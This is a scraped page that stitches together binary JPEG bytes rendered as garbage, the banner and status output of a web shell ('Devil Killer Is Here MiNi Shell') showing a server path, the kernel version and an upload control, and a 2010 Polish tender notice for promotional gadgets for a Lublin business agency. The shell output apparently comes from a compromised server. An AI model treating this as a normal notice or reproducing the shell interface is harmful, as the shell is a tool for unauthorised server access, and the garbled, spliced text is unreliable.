JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100914/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100914/291422-N-2010.html

<p class="kh_header"><b>Lublin: Wykonanie gadżetów promocyjnych na potrzeby Lubelskiej Agencji Wspierania Przedsiębiorczości w Lublinie</b><br>
<b>Numer ogłoszenia: 291422 - 2010; data zamieszczenia: 14.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Lubelska Agencja Wspierania Przedsiębiorczości w Lublinie , ul. Graniczna 4, 20-010 Lublin, woj. lubelskie, tel. 0-81 46 23 800, faks 0-81 46 23 840.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lawp.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie gadżetów promocyjnych na potrzeby Lubelskiej Agencji Wspierania Przedsiębiorczości w Lublinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie i dostarczenie następujących gadżetów promocyjnych dla Lubelskiej Agencji Wspierania Przedsiębiorczości w Lublinie:
1.	Kubki porcelanowe: 
1)	Nakład: 1000 szt.
2)	Materiał: porcelit
3)	Kolor kubka: brąz, biały, niebieski (jak na załączonym przykładzie) lub inny układ kolorów np. zielony, biały, niebieski 
4)	Pojemność: ok. 300 ml
5)	Wymiary: około 12,3 x o 10 cm (+- 1 cm)
6)	Opis: kubek ze spodeczkiem, który może być użyty, jako przykrywka, kubek o nieregularnych, wklęsłych bokach, średnica w najszerszej części kubka ok. 10cm (+ - 1 cm), wewnątrz kubka adres internetowy www.lawp.lubelskie.pl (kolor nadruku czytelny i widoczny)
, na spodku: zestaw znaków graficznych:
a)	logo Narodowej Strategii Spójności (dla Programu Regionalnego),
b)	 herb Województwa Lubelskiego, z dopiskiem Województwo Lubelskie, z prawej strony znaku,
c)	logo Lubelskiej Agencji Wspierania Przedsiębiorczości w Lublinie 
d)	emblemat Unii Europejskiej, z dopiskiem Unia Europejska z lewej strony znaku lub poniżej, a tam gdzie jest możliwe również dopisek przy znaku UE Europejski Fundusz Rozwoju Regionalnego
7)	Opakowanie: Kubek jest umieszczony w eleganckim, okrągłym pudełku wykonanym z grubej tektury o grubości ok. 2 mm. (powleczone papierem kredowy błyszczącym) wewnątrz wyłożone materiałem błyszczącym w kolorze np. granatowym. W środku przygotowane miejsce (wgłębienie) na  kubek i spodek zapobiegające przemieszczaniu się. Wieczko zdejmowane z umocowanym ozdobnym sznureczkiem z materiału (lub sznurka)
8)	Kolor opakowania nawiązujący do kolorystyki kubka: np. brąz, biały, niebieski (jak na załączonym przykładzie) lub inny układ kolorów np. zielony, biały, niebieski 
9)	Nadruk na wieczku: adres www.lawp.lubelskie.pl (kolor nadruku czytelny i widoczny na tle opakowania)
10)	Nadruk na pudełku czytelny i widoczny na tle opakowania - zestaw znaków graficznych(full kolor):
a)	logo Narodowej Strategii Spójności (dla Programu Regionalnego),
b)	herb Województwa Lubelskiego, z dopiskiem Województwo Lubelskie, z prawej strony znaku,
c)	logo Lubelskiej Agencji Wspierania Przedsiębiorczości w Lublinie
d)	emblemat Unii Europejskiej, z dopiskiem Unia Europejska z lewej strony znaku lub poniżej, a tam gdzie jest możliwe również dopisek przy znaku UE Europejski Fundusz Rozwoju Regionalnego

2.	Podkładka pod kubek:
1)	Nakład:  1000 szt.
2)	Materiał: pianka PCV, wierzchnia warstwa podkładki wykonana z laminatu 
z fakturą, spodnia warstwa z szarej lub czarnej pianki o grubości 1,5 - 2  mm.
3)	Kolor: 250 szt. niebieski, 250 szt. czarne, 250 szt. czerwone, 250 szt. zielone
4)	Wymiary: o 10 cm  
5)	Grubość: ok. 4 mm
6)	Opis: Podkładki wykonane na miękkiej piance zapewniającej znakomite przyleganie do stołu biurka, zapobiegające przesuwaniu się
7)	Nadruk: offset CMYK (pełny kolor), na zewnętrznej stronie podkładki, zestaw znaków graficznych umieszczony centralnie na środku:
a)	logo Narodowej Strategii Spójności (dla Programu Regionalnego),
b)	herb Województwa Lubelskiego, z dopiskiem Województwo Lubelskie, 
z prawej strony znaku,
c)	logo Lubelskiej Agencji Wspierania Przedsiębiorczości w Lublinie 
b)	emblemat Unii Europejskiej, z dopiskiem Unia Europejska z lewej strony znaku lub poniżej, a tam gdzie jest możliwe również dopisek przy znaku UE Europejski Fundusz Rozwoju Regionalnego
8)	przy dolnej krawędzi w kształcie półkola adres internetowy www.lawp.lubelskie.pl
9)	przy górnej krawędzi w kształcie półkola hasło: Twój pomysł, europejskie pieniądze


3.	Zestaw piśmienniczy składający się z pióra kulkowego i długopisu wraz ze etui:
1)	Nakład: 300 szt. 
2)	Materiał: 
     długopis - automatyczny, korpus metalowy pokryty satynowym lakierem w kolorze klasycznej, matowej czerni,  końcówka dolna metalowa przykręcana; w kolorze srebrnym, uchwyt mocujący metalowy; klips sprężynujący, który umożliwia łatwe zaczepianie 
w kieszeni lub w teczce, w środkowej części pierścień w kolorze srebrnym. 

 	pióro kulkowe-  korpus i skuwka precyzyjnie pokrytymi satynowym lakierem w kolorze klasycznej, matowej czerni, końcówka dolna metalowa w kolorze srebrnym, uchwyt mocujący metalowy; klips sprężynujący, który umożliwia łatwe zaczepianie w kieszeni lub w teczce, w środkowej części pierścień w kolorze srebrnym, 
3)	Kolor:
- pióra i długopisu: czarny  
- etui: czarny
4)	Wymiary: 
- długopis:13,5 cm(+ - 1 cm)
- pióro: 13,5 cm(+ - 1 cm)
- etui:17x5,5x1,8 cm(+ - 1 cm)
5)	Opis: 
- Długopis otwierany przez przekręcenie: wkład cienko piszący w kolorze niebieskim o grubości 0,3 - max. 0,4 mm, rozszerzany w środkowej części
- Pióro kulkowe: wkład czarny, rozszerzane w środkowej części
6)	Opakowanie eleganckie etui: wymiary w przybliżeniu: 17 x 6 x 2 cm (dopuszczalna różnica + - 1 cm na każdym wymiarze) laminowane tekturowe(zapinane na klapkę z  np. magnesem), w środku dwie osobne komory na pióro i długopis 
7)	Nadruk na długopisie i piórze:
Logotypy: RPO WL 2007 - 2013, flaga UE,  metoda nadruku: grawer laserowy, 
w wariancie kolorystycznym achromatycznym białym lub srebrnym 
Nadruk na zewnętrznej stronie etui zestaw znaków graficznych w wariancie kolorystycznym achromatycznym białym lub srebrnym:
a) logo Narodowej Strategii Spójności (dla Programu Regionalnego),
b) herb Województwa Lubelskiego, z dopiskiem Województwo Lubelskie, 
z prawej strony znaku,
c) logo Lubelskiej Agencji Wspierania Przedsiębiorczości w Lublinie 
d) emblemat Unii Europejskiej, z dopiskiem Unia Europejska z lewej strony znaku lub poniżej, a tam gdzie jest możliwe również dopisek przy znaku UE Europejski Fundusz Rozwoju Regionalnego
e) hasło: Twój pomysł europejskie pieniądze

4.	Pendrive:
1)	Nakład: 300 szt.
2)	Wymiary: 6 cm (+ -1,5 cm) x 2 cm (+ -0,5 cm) x 1 cm (+ - 0,5 cm),
3)	Opis: Pendrive ze skuwką zsuwaną, obudowa matowe aluminium, w kolorze srebrnym satynowym, uchwyt zawieszka umożliwiający zawieszenie na smyczy, pojemność 4 GB, typ złącza USB 2.0, nasadka dopasowana do pamięci, nakładana na wcisk, gwarancja 2 lata,
4)	Nadruk: znakowanie grawerem jednostronne na dłuższej części aluminiowej, ciąg znaków graficznych:
a) logo Narodowej Strategii Spójności (dla Programu Regionalnego),
b) emblemat Unii Europejskiej, z dopiskiem Unia Europejska z lewej strony znaku lub poniżej
c) adres strony internetowej: www.lawp.lubelskie.pl 
5)	Opakowanie: eleganckie granatowe pudełko na pamięć o wymiarach 11, 5 cm (+ - 2 cm) x 10,5 cm (+ - 2 cm) x 2 cm (+ - 1 cm), wyłożone materiałem błyszczącym w kolorze granatowym. Pudełko wykonane z grubej tektury o grubości ok. 2 mm. W środku przygotowane miejsce (wgłębienie) dla pamięci pendrive. 
6)	Nadruk na opakowaniu ( na  środku wieczka od wewnętrznej, otwieranej strony) zestaw znaków graficznych w wariancie kolorystycznym achromatycznym białym lub srebrnym:
a) logo Narodowej Strategii Spójności (dla Programu Regionalnego),
b) herb Województwa Lubelskiego, z dopiskiem Województwo Lubelskie, 
z prawej strony znaku,
c) logo Lubelskiej Agencji Wspierania Przedsiębiorczości w Lublinie 
d) emblemat Unii Europejskiej, z dopiskiem Unia Europejska z lewej strony znaku lub poniżej, a tam gdzie jest możliwe również dopisek przy znaku UE Europejski Fundusz Rozwoju Regionalnego
e) hasło: Twój pomysł europejskie pieniądze

5.	Maskotka promocyjna - miś:
1)	Nakład: 300 szt.
2)	Materiał: miś - plusz, koszulka - bawełna w kolorze białym
3)	Kolor misia: odcień beżowego  brązowego 
4)	Wymiary: wys. ok. 200 mm (+ - 30 mm)
5)	Nadruk: na koszulce 1 pole nadruku z przodu koszulki wykonanie w 4 kolorach pole nadruku: 40 x 25 mm (uproszczone logotypy)
6)	Logotypy do zamieszczenia na koszulce misia: 
a) logo Narodowej Strategii Spójności (dla Programu Regionalnego),
b) herb Województwa Lubelskiego, z dopiskiem Województwo Lubelskie, 
z prawej strony znaku,
c) logo Lubelskiej Agencji Wspierania Przedsiębiorczości w Lublinie 
d) emblemat Unii Europejskiej, z dopiskiem Unia Europejska z lewej strony znaku lub poniżej, a tam gdzie jest możliwe również dopisek przy znaku UE Europejski Fundusz Rozwoju Regionalnego
7)	Metoda nadruku: dowolna trwała
8)	Kolor nadruku 
- na koszulce: ( full kolor) 

6.	Organizer z kalendarium z wkładką informacyjną
1)	Nakład: 200 szt.
2)	Format: A5 (20 cm (+ -0,5 cm) x 24 cm (+ -1 cm) x 4,5 cm (+ -0,5 cm)
3)	Oprawa: materiał skóropodobny ( materiał np. typu VELLUTO)z ozdobnym przeszyciem, na okładce tłoczony zestaw znaków:  
a) logo Narodowej Strategii Spójności (dla Programu Regionalnego),
b) herb Województwa Lubelskiego, z dopiskiem Województwo Lubelskie, 
z prawej strony znaku,
c) logo Lubelskiej Agencji Wspierania Przedsiębiorczości w Lublinie 
d) emblemat Unii Europejskiej, z dopiskiem Unia Europejska z lewej strony znaku lub poniżej, a tam gdzie jest możliwe również dopisek przy znaku UE Europejski Fundusz Rozwoju Regionalnego
e) hasło promocyjne: Twój pomysł, europejskie pieniądze 
4)	Kolor oprawy: 50 szt. czerwony, 50 szt. granatowy, 50 szt. zielony, 50 szt. fioletowy
5)	Papier: 70 g . m2, bezchlorkowy, biały
6)	Kalendarium: tydzień na 2 stronach, kalendarz wieczny tzn. na każdy rok, każdy miesiąc oznaczony osobną zakładką w innym kolorze, druk dwukolorowy czarno - czerwony. Polskie święta i imieniny,  kalendarium  w 4 językach: polski, angielski, niemiecki i rosyjski
7)	Wykończenie: organizer wyposażony w ring czteropierścieniowy o pojemności 3 cm (+ -0,5 cm), 10 kieszonek na kartę kredytową , kieszonkę na wizytówki, kieszonkę zamykaną na suwak, uchwyt na pióro, zamykany na klapkę z magnesem, Wkłady wymienne organizera: Wkład wpinany (dziurowany uniwersalnie) w formacie A-5 (16 cm (+ -1 cm) x 22 cm (+ -1 cm) x 2,5 cm (+ -0,5 cm) zawierające: 6 przekładek tematycznych: kalendarz wieczny, do wykonania, projekty, notes, finanse, adresy, 
8)	dodatkowo wkładka informacyjna Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007-2013, 4-stronicowa, zadruk 4 + 4 (papier 80 g m2) z informacjami dotyczącymi Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007-2013 (w tym adresami instytucji zaangażowanych w realizację programu, instytucji o zasięgu centralnym 
i naczelnym). Wykonawca wykona druk wkładki informacyjnej, w oparciu 
o przekazane przez Zamawiającego dokumenty i materiały w formie elektronicznej
9)	Opakowanie jednostkowe: foliowe 


7.	Domino w drewnianym pudełku 
1)	Nakład: 500 szt. 
2)	Rozmiar: 14,8 x 4,9 x 3 cm
3)	Kolor: kostki czarne z białymi oczkami
4)	Opis produktu: gra domino 28 kostek 
5)	Opakowanie: ozdobne drewniane pudełko, z wysuwanym wieczkiem od góry 
6)	Nadruk: kolor logotypu achromatyczny, na  przedniej bocznej ściance logotypy RPO WL 2007 - 2013, herb Województwa, logotyp LAWP, flaga UE w układzie achromatycznym, 

8.	 Pinsy metalowe 
1)	Nakład: 250 szt.
2)	Materiały: Znaczek metalowy emaliowany 
3)	Wymiary:  pinsy w kształcie prostokąta, wielkość ok.  2 x 1 cm (+ - 3 mm)
4)	Kolor: Kolor tła -10 % czarnego,  Kolor logotypu: niebiesko - żółto - biało - czerwony (napis w kolorze czarnym)
5)	Opis: znak graficzny - logotyp Programu Regionalnego. Pod znakiem graficznym napis PROGRAM REGIONALNY, znaczek metalowy typu pins, mocowanie: zapinka typu motylek
6)	Opakowanie: opakowanie tekturowe (białe), 35mm x 15 mm
7)	Nadruk na opakowaniu: 
a) logo Narodowej Strategii Spójności (dla Programu Regionalnego),
b) herb Województwa Lubelskiego, z dopiskiem Województwo Lubelskie, 
z prawej strony znaku,
c) logo Lubelskiej Agencji Wspierania Przedsiębiorczości w Lublinie 
d) emblemat Unii Europejskiej, z dopiskiem Unia Europejska z lewej strony znaku lub poniżej, a tam gdzie jest możliwe również dopisek przy znaku UE Europejski Fundusz Rozwoju Regionalnego

9.	Metalowa smycz na łańcuszku w opakowaniu:
1)	Nakład:  500 szt. 
2)	Materiał: metal, ekoskóra
3)	Rozmiary: grubość 2 mm, długość min. 2x340 mm;
4)	Nadruk: technika znakowania: grawer laserowy jednostronny na metalowym elemencie Wielkość znakowania: ok. 20 x 5 mm, logo Narodowej Strategii Spójności (dla Programu Regionalnego),
5)	Kolory skóropodobnej końcówki:
- czarny 
6)	Opis: metalowy łańcuszek o grubości 2 mm i długości min. 2x340 mm; metalowa złączka; (wymiary: min. 35 x 12 mm); końcówka z ekoskóry (połączona na stałe z odczepianą częścią złączki); wykończenie: linka na telefon komórkowy ,Mp3 + metalowy karabińczyk; 
7)	Opakowanie: Pudełko na smycz wykonane z kartonu z okienkiem
8)	Kolor czarny lub granatowy
9)	Wymiary: 2,2 x 4,5 x 18,5 cm (dopuszczalna różnica + - 0,5 cm na każdym wymiarze)
10)	technika znakowania: tampondruk
11)	kolor znakowania: achromatyczny srebrny na wieczku pudełka
12)	Znakowanie - zestaw znaków z lewej strony pudełka na dłuższym boku:
a) logo Narodowej Strategii Spójności (dla Programu Regionalnego),
b) herb Województwa Lubelskiego, z dopiskiem  Województwo Lubelskie, z prawej strony znaku,
c) logo Lubelskiej Agencji Wspierania Przedsiębiorczości w Lublinie 
d) emblemat Unii Europejskiej, z dopiskiem  Unia Europejska z lewej strony znaku lub poniżej, a tam gdzie jest możliwe również dopisek przy znaku UE Europejski Fundusz Rozwoju Regionalnego
Z prawej strony pudełka na dłuższym boku: Hasło promocyjne; Twój pomysł, europejskie pieniądze 

10.	Bluza polarowa z kapturem:
1)	Nakład: 120 szt. 
Fason damski - bluza taliowana
- kolor granatowy (60 szt.: S-20,M-20, L-20)
Fason męski - bluza kroju unisex
- kolor granatowy (60 szt.: S-10,M-20, L-20, XL-10)
2)	Materiał wykończenie:
Bluza z kapturem typu polar - polar z warstwą antypiligową materiał niemechecący się, o wysokiej jakości - np. Q-FLEECE, shelter, gramatura 350 g; zapięcie na długi zamek, dwie kieszenie z przodu zapinane na zamek, ściągacz z dołu (tylko w fasonie męskim), ściągacz przy rękawie (tylko w fasonie męskim), ściągacze przy kapturze, stójka, kaptur odpinany na zamek
3)	Logotypy: 
- Metoda znakowania: haft wielokolorowy, na piersi po lewej stronie
- Wielkość znakowania: 8 x 2 cm (+  - 1 cm) 
- Logotypy w kolejności (od lewej) - logo NSS RPO, logo województwa, logo LAWP  i flaga UE
4)	Całość zaprojektowana przez wykonawcę z uwzględnieniem materiału elektronicznego przekazanego przez zamawiającego.
5)	Opakowanie: każda sztuka zapakowana oddzielnie w opakowanie foliowe 


11.	Koszulka typu T -shirt:
1)	Nakład: 120 szt. 
Fason damski - koszulka taliowana  polo
- kolor niebieski ( 60 szt.: S- 20 szt., M-20 szt., L-20 szt.)
Fason męski - T-shirt kroju unisex polo
- kolor niebieski ( 60 szt.: S- 20 szt., M-20 szt., L-20 szt.)
2)	Materiał/wykończenie:
-100% bawełna półczesana gramatura minimum 190g, podwójne szwy, po bokach koszulki rozporki, zapięcie pod szyję na 3 guziki
3)	Metoda znakowania: - haft wielokolorowy
- na dole po prawej stronie 
- Logotypy w kolejności (od lewej) - logo NSS RPO, logo województwa, logo LAWP, flaga UE
4)	Opakowanie: 
- każda koszulka zapakowana w worek foliowy

12.	Upominek świąteczny- bombka z pralinkami marki Lindt lub równoważnej
1)	Nakład: 250 szt.
2)	Wymiary: średnica bombki 11 cm (+ - 1 cm)
3)	Opis: metalowa bombka ozdobiona motywem świątecznym, w kolorze czerwonym (błyszcząca), z pokrywą i dołączonym do pokrywy karnecikiem świątecznym na czerwonym sznureczku. Zawierająca 11 mlecznych pralinek czekoladowych z delikatnie rozpływającym się nadzieniem marki Lindor lub równoważnych o smaku mlecznym. Termin przydatności do spożycia: minimum sześć miesięcy od daty dostawy do Zamawiającego
4)	 Przez znaczenie słowa marki równoważnej Zamawiający rozumie markę/firmę, która wykona pralinki o następującym składzie: cukier, tłuszcze roślinne, masło kakaowe, masa kakaowa, pełne mleko w proszku, odtłuszczone mleko w proszku, laktoza, tłuszcz mleczny, emulgator ( lecytyna sojowa), ekstrakt słodowy jęczmienny, aromaty, wanilia. Może zawierać śladowe ilości orzechów laskowych i migdałów. Kuwertura: Czekolada mleczna: masa kakaowa minimum 31%, masa mleczna minimum 20%. 
5)	Nadruk na bileciku (pełen kolor): zestaw znaków: 4 logotypy 
   a) logo Narodowej Strategii Spójności (dla Programu Regionalnego),
   b) herb Województwa Lubelskiego, z dopiskiem Województwo Lubelskie, z prawej strony znaku,
   c) logo Lubelskiej Agencji Wspierania Przedsiębiorczości w Lublinie 
   d) emblemat Unii Europejskiej, z dopiskiem Unia Europejska z lewej strony znaku lub poniżej, a tam gdzie jest możliwe również dopisek przy znaku UE Europejski Fundusz Rozwoju Regionalnego


13.	Bombonierka z czekoladowymi pralinami
1)	Nakład:  1000 szt. 
2)	Smaki: toffi:200szt., migdałowa: 200szt., orzechowa 200 szt., kawowa 200 szt, advocat 200 szt., 
3)	Wymiary bombonierki: 15x15 cm (+ - 2 cm)
4)	Opis: Elegancka bombonierka zawierająca 9 czekoladek (czekolada mleczna), zawiniętych w laminat i obwolutę. Kartonowe pudełko otwierane od góry, np. ze srebrnego kartonu z tłoczeniem na zewnętrznej stronie wieczka oraz przymocowaną satynową kokardką w kolorze niebieskim 
5)	Termin przydatności do spożycia: minimum sześć miesięcy od daty dostawy do Zamawiającego
6)	Tłoczenie na wieczku: zestaw znaków: 4 logotypy 
a)	logo Narodowej Strategii Spójności (dla Programu Regionalnego),
b)	herb Województwa Lubelskiego, z dopiskiem Województwo Lubelskie,
 z prawej strony znaku,
c)	logo Lubelskiej Agencji Wspierania Przedsiębiorczości w Lublinie 
d)	emblemat Unii Europejskiej, z dopiskiem Unia Europejska z lewej strony znaku lub poniżej, a tam gdzie jest możliwe również dopisek przy znaku UE Europejski Fundusz Rozwoju Regionalnego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium i zabezpieczenia należytego wykonania umowy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy spełnią powyższe warunki, jeśli:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2) posiadają niezbędną wiedzę i doświadczenie w zakresie przedmiotu zamówienia;
3) dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
Zamawiający uzna spełnienie warunków udziału w postępowaniu, o których mowa jest w rozdziale 8.1.2 ppkt. 2 (posiadają niezbędną wiedzę i doświadczenie w zakresie przedmiotu zamówienia) jeżeli wykonawca wykaże, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum 1 usługę odpowiadającą swoim zakresem przedmiotowi zamówienia - usługi wykonania artykułów informacyjnych i promocyjnych, o wartości nie mniejszej od kwoty 50 000,00 PLN brutto (wartość podpisanej umowy), z podaniem jej wartości, przedmiotu, dat wykonania i danych odbiorcy (zamawiającego), oraz załączeniem dokumentu potwierdzającego, że usługi zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo sposobu oceny spełnienia tego warunku. W związku z tym ocena spełnienia tego warunku zostanie dokonana jedynie na podstawie oświadczenia wykonawcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo sposobu oceny spełnienia tego warunku. W związku z tym ocena spełnienia tego warunku zostanie dokonana jedynie na podstawie oświadczenia wykonawcy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo sposobu oceny spełnienia tego warunku. W związku z tym ocena spełnienia tego warunku zostanie dokonana jedynie na podstawie oświadczenia wykonawcy.</p>
</li></ul></li></ul>
